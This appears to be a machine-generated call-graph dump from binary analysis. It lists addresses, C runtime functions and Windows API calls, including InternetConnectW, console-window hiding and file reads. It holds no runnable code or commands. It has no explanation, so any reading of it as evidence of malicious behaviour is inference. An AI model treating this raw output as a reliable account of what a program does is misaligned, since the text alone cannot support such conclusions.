__dosmaperr 20 API calls 109982->109984 109985 b259b3 __Stollx 20 API calls 109983->109985 109986 b38e3c 109984->109986 109988 b38ac2 109985->109988 109989 b259b3 __Stollx 20 API calls 109986->109989 109987->109988 109990 b38b1d 109987->109990 109994 b38b4d 109987->109994 109988->109968 109991 b38b2a 109989->109991 109992 b259a0 __dosmaperr 20 API calls 109990->109992 110049 b25122 26 API calls __cftof 109991->110049 109993 b38b22 109992->109993 109996 b259b3 __Stollx 20 API calls 109993->109996 109997 b38b66 109994->109997 109998 b38ba8 109994->109998 109999 b38b8c 109994->109999 109996->109991 109997->109999 110034 b38b73 109997->110034 110001 b35b94 std::_Locinfo::_W_Getmonths 21 API calls 109998->110001 110000 b259a0 __dosmaperr 20 API calls 109999->110000 110002 b38b91 110000->110002 110003 b38bbf 110001->110003 110004 b259b3 __Stollx 20 API calls 110002->110004 110006 b34d66 _free 20 API calls 110003->110006 110007 b38b98 110004->110007 110005 b3fc47 __fread_nolock 26 API calls 110008 b38d11 110005->110008 110009 b38bc8 110006->110009 110045 b25122 26 API calls __cftof 110007->110045 110011 b38d87 110008->110011 110014 b38d2a GetConsoleMode 110008->110014 110012 b34d66 _free 20 API calls 110009->110012 110013 b38d8b ReadFile 110011->110013 110015 b38bcf 110012->110015 110016 b38da5 110013->110016 110017 b38dff GetLastError 110013->110017 110014->110011 110018 b38d3b 110014->110018 110019 b38bf4 110015->110019 110020 b38bd9 110015->110020 110016->110017 110029 b38d7c 110016->110029 110021 b38d63 110017->110021 110022 b38e0c 110017->110022 110018->110013 110023 b38d41 ReadConsoleW 110018->110023 110028 b38ff6 __wsopen_s 28 API calls 110019->110028 110026 b259b3 __Stollx 20 API calls 110020->110026 110024 b38ba3 __fread_nolock 110021->110024 110046 b2597d 20 API calls 3 library calls 110021->110046 110027 b259b3 __Stollx 20 API calls 110022->110027 110023->110029 110030 b38d5d GetLastError 110023->110030 110025 b34d66 _free 20 API calls 110024->110025 110025->109988 110032 b38bde 110026->110032 110033 b38e11 110027->110033 110028->110034 110029->110024 110037 b38de1 110029->110037 110038 b38dca 110029->110038 110030->110021 110035 b259a0 __dosmaperr 20 API calls 110032->110035 110036 b259a0 __dosmaperr 20 API calls 110033->110036 110034->110005 110035->110024 110036->110024 110037->110024 110039 b38df8 110037->110039 110047 b387bf 31 API calls 4 library calls 110038->110047 110048 b385ff 29 API calls __wsopen_s 110039->110048 110042 b38dfd 110042->110024 110043->109960 110044->109960 110045->110024 110046->110024 110047->110024 110048->110042 110049->109988 110050 b34af6 110051 b34680 71 API calls 110050->110051 110052 b34b0c 110051->110052 110053 b34b1e 110052->110053 110055 b40670 110052->110055 110058 b3ff79 110055->110058 110057 b4068b 110057->110053 110060 b3ff85 __FrameHandler3::FrameUnwindToState 110058->110060 110059 b3ff93 110061 b259b3 __Stollx 20 API calls 110059->110061 110060->110059 110063 b3ffcc 110060->110063 110062 b3ff98 110061->110062 110076 b25122 26 API calls __cftof 110062->110076 110069 b4061f 110063->110069 110068 b3ffa2 std::_Locinfo::_Locinfo_dtor 110068->110057 110070 b41f96 __wsopen_s 31 API calls 110069->110070 110071 b40635 110070->110071 110072 b3fff0 110071->110072 110078 b40690 110071->110078 110077 b40019 LeaveCriticalSection __wsopen_s 110072->110077 110075 b34d66 _free 20 API calls 110075->110072 110076->110068 110077->110068 110125 b403f3 110078->110125 110081 b406c2 110084 b259a0 __dosmaperr 20 API calls 110081->110084 110082 b406db 110083 b3cc7e __wsopen_s 24 API calls 110082->110083 110085 b406e0 110083->110085 110086 b406c7 110084->110086 110087 b40700 110085->110087 110088 b406e9 110085->110088 110091 b259b3 __Stollx 20 API calls 110086->110091 110142 b4035e CreateFileW 110087->110142 110089 b259a0 __dosmaperr 20 API calls 110088->110089 110092 b406ee 110089->110092 110116 b4065d 110091->110116 110093 b259b3 __Stollx 20 API calls 110092->110093 110093->110086 110094 b407b6 GetFileType 110095 b407c1 GetLastError 110094->110095 110096 b40808 110094->110096 110160 b2597d 20 API calls 3 library calls 110095->110160 110104 b3cbc7 __wsopen_s 21 API calls 110096->110104 110097 b4078b GetLastError 110159 b2597d 20 API calls 3 library calls 110097->110159 110100 b40739 110100->110094 110100->110097 110158 b4035e CreateFileW 110100->110158 110101 b407cf CloseHandle 110101->110086 110103 b407f8 110101->110103 110106 b259b3 __Stollx 20 API calls 110103->110106 110107 b40829 110104->110107 110105 b4077e 110105->110094 110105->110097 110109 b407fd 110106->110109 110108 b40875 110107->110108 110143 b4056f 110107->110143 110113 b408a2 110108->110113 110161 b40111 97 API calls 4 library calls 110108->110161 110109->110086 110112 b4089b 110112->110113 110115 b408b3 110112->110115 110114 b3595d __wsopen_s 29 API calls 110113->110114 110114->110116 110115->110116 110117 b40931 CloseHandle 110115->110117 110116->110075 110162 b4035e CreateFileW 110117->110162 110119 b4095c 110120 b40966 GetLastError 110119->110120 110121 b40992 110119->110121 110163 b2597d 20 API calls 3 library calls 110120->110163 110121->110116 110123 b40972 110164 b3cd90 21 API calls 3 library calls 110123->110164 110126 b40414 110125->110126 110127 b4042e 110125->110127 110126->110127 110129 b259b3 __Stollx 20 API calls 110126->110129 110165 b40383 110127->110165 110130 b40423 110129->110130 110172 b25122 26 API calls __cftof 110130->110172 110132 b40466 110133 b40495 110132->110133 110135 b259b3 __Stollx 20 API calls 110132->110135 110140 b404e8 110133->110140 110174 b3046e 26 API calls 2 library calls 110133->110174 110137 b4048a 110135->110137 110136 b404e3 110139 b2514f std::_Locinfo::_W_Getmonths 11 API calls 110136->110139 110136->110140 110173 b25122 26 API calls __cftof 110137->110173 110141 b4056e 110139->110141 110140->110081 110140->110082 110142->110100 110144 b40595 110143->110144 110145 b40599 110143->110145 110144->110108 110145->110144 110146 b38ff6 __wsopen_s 28 API calls 110145->110146 110147 b405ab 110146->110147 110148 b405d1 110147->110148 110149 b405bb 110147->110149 110151 b38aa3 __fread_nolock 38 API calls 110148->110151 110150 b259a0 __dosmaperr 20 API calls 110149->110150 110153 b405c0 110150->110153 110152 b405e3 110151->110152 110157 b405f9 110152->110157 110176 b43441 88 API calls 4 library calls 110152->110176 110153->110144 110155 b259b3 __Stollx 20 API calls 110153->110155 110154 b38ff6 __wsopen_s 28 API calls 110154->110153 110155->110144 110157->110153 110157->110154 110158->110105 110159->110086 110160->110101 110161->110112 110162->110119 110163->110123 110164->110121 110167 b4039b 110165->110167 110166 b403b6 110166->110132 110167->110166 110168 b259b3 __Stollx 20 API calls 110167->110168 110169 b403da 110168->110169 110175 b25122 26 API calls __cftof 110169->110175 110171 b403e5 110171->110132 110172->110127 110173->110133 110174->110136 110175->110171 110176->110157 110177 b336cb 110178 b336a5 __fread_nolock 26 API calls 110177->110178 110179 b336d9 110178->110179 110180 b336e7 110179->110180 110181 b33706 110179->110181 110182 b259b3 __Stollx 20 API calls 110180->110182 110183 b33713 110181->110183 110184 b33720 110181->110184 110185 b336ec 110182->110185 110186 b259b3 __Stollx 20 API calls 110183->110186 110184->110185 110188 b3fc47 __fread_nolock 26 API calls 110184->110188 110189 b337a3 110184->110189 110190 b337b0 110184->110190 110186->110185 110188->110189 110189->110190 110191 b35b37 21 API calls 110189->110191 110192 b338f1 110190->110192 110191->110190 110193 b336a5 __fread_nolock 26 API calls 110192->110193 110194 b33900 110193->110194 110195 b33912 110194->110195 110196 b339a4 110194->110196 110198 b3392f 110195->110198 110201 b33955 110195->110201 110197 b3553d __wsopen_s 88 API calls 110196->110197 110200 b3393c 110197->110200 110199 b3553d __wsopen_s 88 API calls 110198->110199 110199->110200 110200->110185 110201->110200 110203 b38fdb 110201->110203 110206 b38e58 110203->110206 110205 b38ff1 110205->110200 110207 b38e64 __FrameHandler3::FrameUnwindToState 110206->110207 110208 b38e6c 110207->110208 110211 b38e84 110207->110211 110209 b259a0 __dosmaperr 20 API calls 110208->110209 110212 b38e71 110209->110212 110210 b38f38 110213 b259a0 __dosmaperr 20 API calls 110210->110213 110211->110210 110216 b38ebc 110211->110216 110214 b259b3 __Stollx 20 API calls 110212->110214 110215 b38f3d 110213->110215 110226 b38e79 std::_Locinfo::_Locinfo_dtor 110214->110226 110217 b259b3 __Stollx 20 API calls 110215->110217 110231 b3cba4 EnterCriticalSection 110216->110231 110219 b38f45 110217->110219 110233 b25122 26 API calls __cftof 110219->110233 110220 b38ec2 110222 b38ee6 110220->110222 110223 b38efb 110220->110223 110225 b259b3 __Stollx 20 API calls 110222->110225 110224 b38f5d __wsopen_s 28 API calls 110223->110224 110227 b38ef6 110224->110227 110228 b38eeb 110225->110228 110226->110205 110232 b38f30 LeaveCriticalSection __wsopen_s 110227->110232 110229 b259a0 __dosmaperr 20 API calls 110228->110229 110229->110227 110231->110220 110232->110226 110233->110226 110234 a86330 110250 aa6950 28 API calls 3 library calls 110234->110250 110236 a8634f 110236->110234 110241 a86355 110236->110241 110237 a863d1 InternetConnectW 110238 a86402 110237->110238 110252 aa1800 110238->110252 110241->110237 110242 a863c5 110241->110242 110251 aa6950 28 API calls 3 library calls 110241->110251 110242->110237 110243 a862ad messages 110244 a869cd 110243->110244 110246 a862fb messages 110243->110246 110245 b25132 messages 26 API calls 110244->110245 110248 a869d2 110245->110248 110247 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 110246->110247 110249 a866b2 110247->110249 110250->110236 110251->110241 110254 aa1844 110252->110254 110257 aa181e SimpleUString::operator= 110252->110257 110253 aa192e 110265 aadba0 28 API calls SimpleUString::operator= 110253->110265 110254->110253 110258 aa1898 110254->110258 110259 aa18bd 110254->110259 110257->110243 110260 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 110258->110260 110261 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 110259->110261 110263 aa18a9 _Yarn 110259->110263 110260->110263 110261->110263 110262 b25132 messages 26 API calls 110262->110253 110263->110262 110264 aa1910 messages 110263->110264 110264->110243 110266 b34b7b 110271 b348b2 110266->110271 110270 b34ba3 110272 b348e3 try_get_first_available_module 110271->110272 110279 b34a2c 110272->110279 110286 b3fc9d 66 API calls 2 library calls 110272->110286 110273 b259b3 __Stollx 20 API calls 110274 b34ae2 110273->110274 110289 b25122 26 API calls __cftof 110274->110289 110276 b34a37 110276->110270 110283 b409b9 110276->110283 110278 b34a80 110278->110279 110287 b3fc9d 66 API calls 2 library calls 110278->110287 110279->110273 110279->110276 110281 b34a9f 110281->110279 110288 b3fc9d 66 API calls 2 library calls 110281->110288 110290 b40045 110283->110290 110285 b409d4 110285->110270 110286->110278 110287->110281 110288->110279 110289->110276 110292 b40051 __FrameHandler3::FrameUnwindToState 110290->110292 110291 b4005f 110293 b259b3 __Stollx 20 API calls 110291->110293 110292->110291 110294 b40098 110292->110294 110295 b40064 110293->110295 110297 b40690 __wsopen_s 113 API calls 110294->110297 110301 b25122 26 API calls __cftof 110295->110301 110298 b400bc 110297->110298 110302 b400e5 LeaveCriticalSection __wsopen_s 110298->110302 110300 b4006e std::_Locinfo::_Locinfo_dtor 110300->110285 110301->110300 110302->110300 110303 a9bd00 110304 aa1800 collate 28 API calls 110303->110304 110305 a9bd9b 110304->110305 111111 b21700 110305->111111 110308 a9c131 messages 110311 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 110308->110311 110309 b21daa Concurrency::details::_CancellationTokenState::_RegisterCallback 93 API calls 110310 a9bdc9 ListArray 110309->110310 112371 aa8b80 110310->112371 110313 a9c152 110311->110313 110312 a9c160 110314 b25132 messages 26 API calls 110312->110314 110315 a9c165 __wsopen_s 110314->110315 110319 a9c18c GetConsoleWindow ShowWindow 110315->110319 110321 a9c1d4 110319->110321 110356 a9c269 110319->110356 110324 aa1800 collate 28 API calls 110321->110324 110323 a9be9c 112388 a73740 110323->112388 110328 a9c201 110324->110328 110326 aa1940 28 API calls 110326->110328 110328->110326 110330 a9c239 110328->110330 110333 aa1c10 _MREFOpen@16 28 API calls 110330->110333 110331 a9bfee 110332 a9bffd 110331->110332 112408 aa7930 110331->112408 112427 aa7a00 110332->112427 110335 a9c24a 110333->110335 112442 a968a0 326 API calls 11 library calls 110335->112442 110336 a9beea 110336->110331 110340 a9c156 110336->110340 110366 a9bf36 messages 110336->110366 110337 a9c00c 110342 b21daa Concurrency::details::_CancellationTokenState::_RegisterCallback 93 API calls 110337->110342 112441 aa8080 28 API calls SimpleUString::operator= 110340->112441 110342->110332 110343 a9c24f 110347 aa1ac0 collate 26 API calls 110343->110347 110346 a9c15b 110351 b25132 messages 26 API calls 110346->110351 110352 a9c264 110347->110352 110348 a9c415 110365 a9e585 110348->110365 111117 a78780 110348->111117 110349 a9c065 112433 aa47b0 110349->112433 110351->110312 110352->110356 110354 a73740 66 API calls 110354->110349 110356->110348 110357 a9c3fd SetErrorMode SetConsoleTitleW 110356->110357 111114 a858e0 EnumWindows 110357->111114 110358 aa12d0 28 API calls 110358->110366 110361 a9c097 std::ios_base::_Ios_base_dtor 110361->110346 110363 a9c101 messages 110361->110363 110362 a9c510 111154 a82870 110362->111154 110363->110308 110363->110312 110369 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 110365->110369 110366->110331 110366->110336 110366->110346 110366->110358 112400 aaa5b0 110366->112400 112405 a88240 73 API calls 2 library calls 110366->112405 112406 aab5f0 28 API calls 2 library calls 110366->112406 112407 aaafb0 100 API calls 110366->112407 110371 a9e59f 110369->110371 110372 a9c432 110372->110362 111135 aa1360 110372->111135 110388 a9c4cf 110390 aa1ac0 collate 26 API calls 110388->110390 110393 a9c4de 110390->110393 110397 a78780 97 API calls 110393->110397 110399 a9c4f6 110397->110399 110401 aa1ac0 collate 26 API calls 110399->110401 110402 a9c501 110401->110402 110404 aa1ac0 collate 26 API calls 110402->110404 110404->110362 112612 b21568 111111->112612 111113 a9bdb8 111113->110309 111113->110363 111115 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 111114->111115 111116 a85912 111115->111116 111116->110348 111118 a787e1 111117->111118 111119 a78863 111118->111119 111120 a787f8 111118->111120 112631 b254b9 111119->112631 111122 aa1800 collate 28 API calls 111120->111122 111131 a78812 111122->111131 111123 a78875 111124 a788a8 111123->111124 111134 b254b9 28 API calls 111123->111134 112646 aa1940 111123->112646 112651 b24cff 111124->112651 111126 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 111127 a7885f 111126->111127 111127->110372 111129 a78918 111132 b25132 messages 26 API calls 111129->111132 111130 a7883c messages 111130->111126 111131->111129 111131->111130 111133 a7891d 111132->111133 111134->111123 111136 aa138a 111135->111136 111137 aa13ae 111135->111137 111139 aa1800 collate 28 API calls 111136->111139 112722 aa8080 28 API calls SimpleUString::operator= 111137->112722 111141 a9c495 111139->111141 111140 aa13b3 111142 aa9040 111141->111142 111143 aa9050 111142->111143 111143->111143 112723 aae160 111143->112723 111145 a9c4ab 111146 aa9580 111145->111146 111147 aa1940 28 API calls 111146->111147 111148 a9c4c1 111147->111148 111149 aa1ac0 111148->111149 111150 aa1acb 111149->111150 111151 aa1ae6 messages 111149->111151 111150->111151 111152 b25132 messages 26 API calls 111150->111152 111151->110388 111153 aa1b0a 111152->111153 111155 aa1800 collate 28 API calls 111154->111155 111156 a828c1 111155->111156 111157 aa1c10 _MREFOpen@16 28 API calls 111156->111157 111158 a828d7 111157->111158 112733 a81bc0 111158->112733 111160 a8299f messages 111161 aa1800 collate 28 API calls 111160->111161 111162 a829ce 111161->111162 111165 aa1c10 _MREFOpen@16 28 API calls 111162->111165 111163 a830d0 111166 b25132 messages 26 API calls 111163->111166 111164 a828e9 messages 111164->111160 111164->111163 111168 a829e4 111165->111168 111167 a830f3 111166->111167 111169 a81bc0 30 API calls 111168->111169 111172 a829f6 messages 111169->111172 111170 aa1800 collate 28 API calls 111171 a82adb 111170->111171 111173 aa1c10 _MREFOpen@16 28 API calls 111171->111173 111172->111170 111174 a82af1 111173->111174 111175 a81bc0 30 API calls 111174->111175 111176 a82b03 messages 111175->111176 111177 aaa4d0 28 API calls 111176->111177 111178 a82bf5 111177->111178 111179 aa1800 collate 28 API calls 111178->111179 111180 a82c21 111179->111180 111181 aa1c10 _MREFOpen@16 28 API calls 111180->111181 111182 a82c33 111181->111182 111183 a81bc0 30 API calls 111182->111183 111186 a82c42 messages 111183->111186 111184 aaa5b0 28 API calls 111185 a82d13 111184->111185 112809 aa6c20 111185->112809 111186->111184 111188 a82d30 111189 aaa4d0 28 API calls 111188->111189 111190 a82d62 111189->111190 111191 aa1800 collate 28 API calls 111190->111191 111192 a82d8b 111191->111192 111193 aa1c10 _MREFOpen@16 28 API calls 111192->111193 111194 a82d9d 111193->111194 111195 a81bc0 30 API calls 111194->111195 111196 a82dac messages 111195->111196 111197 aaa5b0 28 API calls 111196->111197 111198 a82e7d 111197->111198 111199 aa6c20 SimpleUString::operator= 28 API calls 111198->111199 111200 a82e9a 111199->111200 111201 aa1800 collate 28 API calls 111200->111201 111202 a82ebf 111201->111202 111203 aa1c10 _MREFOpen@16 28 API calls 111202->111203 111204 a82ed2 111203->111204 111205 a81bc0 30 API calls 111204->111205 112372 a737c0 68 API calls 112371->112372 112373 aa8bae 112372->112373 114012 aa8dc0 112373->114012 112375 aa8c21 112378 a9be43 112375->112378 114033 ae8c40 4 API calls 2 library calls 112375->114033 112377 a73740 66 API calls 112377->112375 112380 aa7b00 112378->112380 112381 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112380->112381 112382 aa7b37 112381->112382 112383 ae89f6 std::locale::_Init 66 API calls 112382->112383 112384 aa7b4e 112383->112384 112385 aa7a00 26 API calls 112384->112385 112386 a9be7e 112385->112386 112387 aa8620 98 API calls 112386->112387 112387->110323 112389 a73762 112388->112389 112391 a7375a 112388->112391 112399 aaafb0 100 API calls 112389->112399 112390 a73772 114037 a72550 66 API calls 3 library calls 112390->114037 112391->112390 114036 b17e0c RaiseException 112391->114036 112394 a7379a 114038 a73660 28 API calls 3 library calls 112394->114038 112396 a737a8 114039 b17e0c RaiseException 112396->114039 112398 a737b7 112399->110336 112401 aa0f10 28 API calls 112400->112401 112402 aaa603 112401->112402 112403 aaa63b 112402->112403 114040 aa6950 28 API calls 3 library calls 112402->114040 112403->110366 112405->110366 112406->110366 112407->110366 112409 aa79ea 112408->112409 112410 aa794d 112408->112410 112411 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 112409->112411 112410->112409 112416 aa7957 112410->112416 112412 aa79f7 112411->112412 112412->110337 112413 aa79d8 112414 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 112413->112414 112415 aa79e6 112414->112415 112415->110337 112416->112413 112417 aa79a0 112416->112417 112418 aa7986 112416->112418 112420 aa79c1 112417->112420 112422 b258e2 90 API calls 112417->112422 112418->112413 112419 aa798b 112418->112419 112421 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 112419->112421 112423 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 112420->112423 112424 aa799c 112421->112424 112425 aa79ba 112422->112425 112426 aa79d4 112423->112426 112424->110337 112425->112413 112425->112420 112426->110337 112428 aa7a80 112427->112428 112429 aa7aa7 112427->112429 114041 b21ab7 26 API calls 2 library calls 112428->114041 112431 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 112429->112431 112432 a9c037 112431->112432 112432->110349 112432->110354 112435 aa47e2 112433->112435 112434 aa4829 messages 112434->110361 112435->112434 112437 aa7930 90 API calls 112435->112437 112440 aa481b 112435->112440 112436 aa7a00 26 API calls 112436->112434 112438 aa4813 112437->112438 112439 b21daa Concurrency::details::_CancellationTokenState::_RegisterCallback 93 API calls 112438->112439 112439->112440 112440->112436 112441->110346 112442->110343 112614 b21574 __FrameHandler3::FrameUnwindToState 112612->112614 112613 b21582 112615 b259b3 __Stollx 20 API calls 112613->112615 112614->112613 112616 b215af 112614->112616 112617 b21587 112615->112617 112618 b215c1 112616->112618 112619 b215b4 112616->112619 112629 b25122 26 API calls __cftof 112617->112629 112622 b34523 std::_Xfsopen 23 API calls 112618->112622 112621 b259b3 __Stollx 20 API calls 112619->112621 112628 b21592 std::_Locinfo::_Locinfo_dtor 112621->112628 112623 b215ca 112622->112623 112624 b215d1 112623->112624 112625 b215de 112623->112625 112626 b259b3 __Stollx 20 API calls 112624->112626 112630 b21612 LeaveCriticalSection std::_Xfsopen 112625->112630 112626->112628 112628->111113 112629->112628 112630->112628 112632 b253f4 __FrameHandler3::FrameUnwindToState 112631->112632 112633 b2540c 112632->112633 112634 b25438 112632->112634 112635 b259b3 __Stollx 20 API calls 112633->112635 112640 b2541c std::_Locinfo::_Locinfo_dtor 112634->112640 112682 b21afd EnterCriticalSection 112634->112682 112636 b25411 112635->112636 112698 b25122 26 API calls __cftof 112636->112698 112639 b2544b 112683 b242f5 112639->112683 112640->111123 112642 b2547e 112699 b254af LeaveCriticalSection std::_Xfsopen 112642->112699 112645 b25457 112645->112642 112691 b24e1a 112645->112691 112647 aa1950 112646->112647 112647->112647 112648 aabba0 _MREFOpen@16 28 API calls 112647->112648 112649 aa1967 SimpleUString::operator= 112647->112649 112650 aa19a2 112648->112650 112649->111123 112650->111123 112652 b24d0b __FrameHandler3::FrameUnwindToState 112651->112652 112653 b24d31 112652->112653 112654 b24d19 112652->112654 112702 b2c20b EnterCriticalSection 112653->112702 112655 b259b3 __Stollx 20 API calls 112654->112655 112657 b24d1e 112655->112657 112719 b25122 26 API calls __cftof 112657->112719 112658 b24d3e 112660 b24c8c 29 API calls 112658->112660 112661 b24d49 112660->112661 112662 b24d50 112661->112662 112663 b24d5d 112661->112663 112665 b259b3 __Stollx 20 API calls 112662->112665 112664 b21daa Concurrency::details::_CancellationTokenState::_RegisterCallback 93 API calls 112663->112664 112666 b24d63 112664->112666 112678 b24d55 112665->112678 112668 b259b3 __Stollx 20 API calls 112666->112668 112667 b24d29 std::_Locinfo::_Locinfo_dtor 112667->111131 112670 b24d72 112668->112670 112671 b259b3 __Stollx 20 API calls 112670->112671 112672 b24d79 112671->112672 112703 b36c52 112672->112703 112675 b24da6 112676 b259b3 __Stollx 20 API calls 112675->112676 112676->112678 112677 b259b3 __Stollx 20 API calls 112679 b24d98 112677->112679 112720 b24dca LeaveCriticalSection std::_Lockit::~_Lockit 112678->112720 112679->112675 112680 b24d9d 112679->112680 112681 b259b3 __Stollx 20 API calls 112680->112681 112681->112678 112682->112639 112684 b24308 112683->112684 112690 b2436e 112683->112690 112685 b336a5 __fread_nolock 26 API calls 112684->112685 112687 b2430e 112685->112687 112686 b259b3 __Stollx 20 API calls 112688 b24363 112686->112688 112687->112686 112687->112690 112700 b25122 26 API calls __cftof 112688->112700 112690->112645 112692 b24dde 112691->112692 112693 b259b3 __Stollx 20 API calls 112692->112693 112696 b24dff __fread_nolock 112692->112696 112694 b24def 112693->112694 112701 b25122 26 API calls __cftof 112694->112701 112696->112645 112697 b24dfa 112697->112645 112698->112640 112699->112640 112700->112690 112701->112697 112702->112658 112704 b36c65 112703->112704 112705 b36cdc 112704->112705 112706 b36c73 WaitForSingleObject 112704->112706 112707 b259b3 __Stollx 20 API calls 112705->112707 112708 b36c9b GetLastError 112706->112708 112709 b36c7f GetExitCodeProcess 112706->112709 112717 b24d8c 112707->112717 112710 b36ca6 112708->112710 112711 b36cbe 112708->112711 112709->112708 112718 b36c8e 112709->112718 112712 b259b3 __Stollx 20 API calls 112710->112712 112721 b2597d 20 API calls 3 library calls 112711->112721 112714 b36cab 112712->112714 112715 b259a0 __dosmaperr 20 API calls 112714->112715 112715->112718 112716 b36cd1 CloseHandle 112716->112717 112717->112675 112717->112677 112718->112716 112718->112717 112719->112667 112720->112667 112721->112718 112722->111140 112724 aae176 112723->112724 112725 aae227 112723->112725 112730 aae188 _Yarn SimpleUString::operator= 112724->112730 112731 aaf7d0 28 API calls 4 library calls 112724->112731 112732 aa8080 28 API calls SimpleUString::operator= 112725->112732 112728 aae22c 112729 aae220 112729->111145 112730->111145 112731->112729 112732->112728 112734 aa1c10 _MREFOpen@16 28 API calls 112733->112734 112735 a81c1b 112734->112735 112736 a77fe0 28 API calls 112735->112736 112737 a81c8f 112736->112737 112819 aa1440 112737->112819 112739 a81cdf 112740 a81d07 SimpleUString::operator= 112739->112740 112741 aabba0 _MREFOpen@16 28 API calls 112739->112741 112742 aa1940 28 API calls 112740->112742 112741->112740 112744 a81d64 ListArray messages 112742->112744 112743 a82762 112746 b25132 messages 26 API calls 112743->112746 112744->112743 112831 a82780 112744->112831 112748 a82767 112746->112748 112749 b25132 messages 26 API calls 112748->112749 112751 a8276c 112749->112751 112753 b25132 messages 26 API calls 112751->112753 112752 a81df0 ListArray 112755 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112752->112755 112754 a82771 112753->112754 112893 aa8080 28 API calls SimpleUString::operator= 112754->112893 112757 a81e0a 112755->112757 112841 ab4760 112757->112841 112758 a82776 112760 a81e28 112864 abb730 112760->112864 112762 a81e5b ListArray 112763 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112762->112763 112764 a81e76 112763->112764 112765 ab4760 28 API calls 112764->112765 112766 a81e9b 112765->112766 112767 a776c0 30 API calls 112766->112767 112768 a81ecd 112767->112768 112769 aa1800 collate 28 API calls 112768->112769 112770 a81ee0 112769->112770 112771 a77fe0 28 API calls 112770->112771 112772 a81ef1 messages 112771->112772 112772->112748 112773 a825c8 112772->112773 112774 a81fc6 112772->112774 112775 aa1800 collate 28 API calls 112773->112775 112774->112754 112776 a77fe0 28 API calls 112774->112776 112808 a82289 messages 112775->112808 112777 a81fee 112776->112777 112778 aa1440 _MREFOpen@16 28 API calls 112777->112778 112779 a82044 112778->112779 112780 a8206c SimpleUString::operator= 112779->112780 112781 aabba0 _MREFOpen@16 28 API calls 112779->112781 112782 aa1940 28 API calls 112780->112782 112781->112780 112785 a820c9 ListArray messages 112782->112785 112783 a8275d 112784 b25132 messages 26 API calls 112783->112784 112784->112743 112785->112751 112787 a82780 30 API calls 112785->112787 112786 a8253f messages 112788 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 112786->112788 112789 a8213a 112787->112789 112790 a82562 112788->112790 112791 ab6b40 30 API calls 112789->112791 112790->111164 112792 a82155 ListArray 112791->112792 112793 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112792->112793 112794 a8216f 112793->112794 112795 ab4760 28 API calls 112794->112795 112796 a8218d 112795->112796 112797 abb730 30 API calls 112796->112797 112798 a821c0 ListArray 112797->112798 112799 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112798->112799 112800 a821db 112799->112800 112801 ab4760 28 API calls 112800->112801 112802 a82200 112801->112802 112803 a776c0 30 API calls 112802->112803 112804 a82232 112803->112804 112805 a77fe0 28 API calls 112804->112805 112806 a82247 112805->112806 112807 aa1800 collate 28 API calls 112806->112807 112806->112808 112807->112808 112808->112754 112808->112783 112808->112786 112812 aa6c3e SimpleUString::operator= 112809->112812 112813 aa6c70 112809->112813 112810 aa6d2f 112996 aadba0 28 API calls SimpleUString::operator= 112810->112996 112812->111188 112813->112810 112995 aa7510 28 API calls 2 library calls 112813->112995 112816 aa6d0e messages 112816->111188 112817 aa6cc3 _Yarn 112817->112816 112818 b25132 messages 26 API calls 112817->112818 112818->112810 112821 aa145b 112819->112821 112830 aa154b _Yarn messages 112819->112830 112820 aa15d8 112894 aadba0 28 API calls SimpleUString::operator= 112820->112894 112821->112820 112824 aa14cc 112821->112824 112825 aa14f6 112821->112825 112829 aa14dd _Yarn 112821->112829 112821->112830 112826 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112824->112826 112827 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 112825->112827 112825->112829 112826->112829 112827->112829 112828 b25132 messages 26 API calls 112828->112820 112829->112828 112829->112830 112830->112739 112895 a7ca90 112831->112895 112834 ab4760 28 API calls 112835 a827e0 112834->112835 112904 aa6670 112835->112904 112837 a81dd5 112838 ab6b40 112837->112838 112919 aa9900 112838->112919 112840 ab6bac 112840->112752 112842 ab47b6 112841->112842 112846 ab4791 112841->112846 112843 b005bb 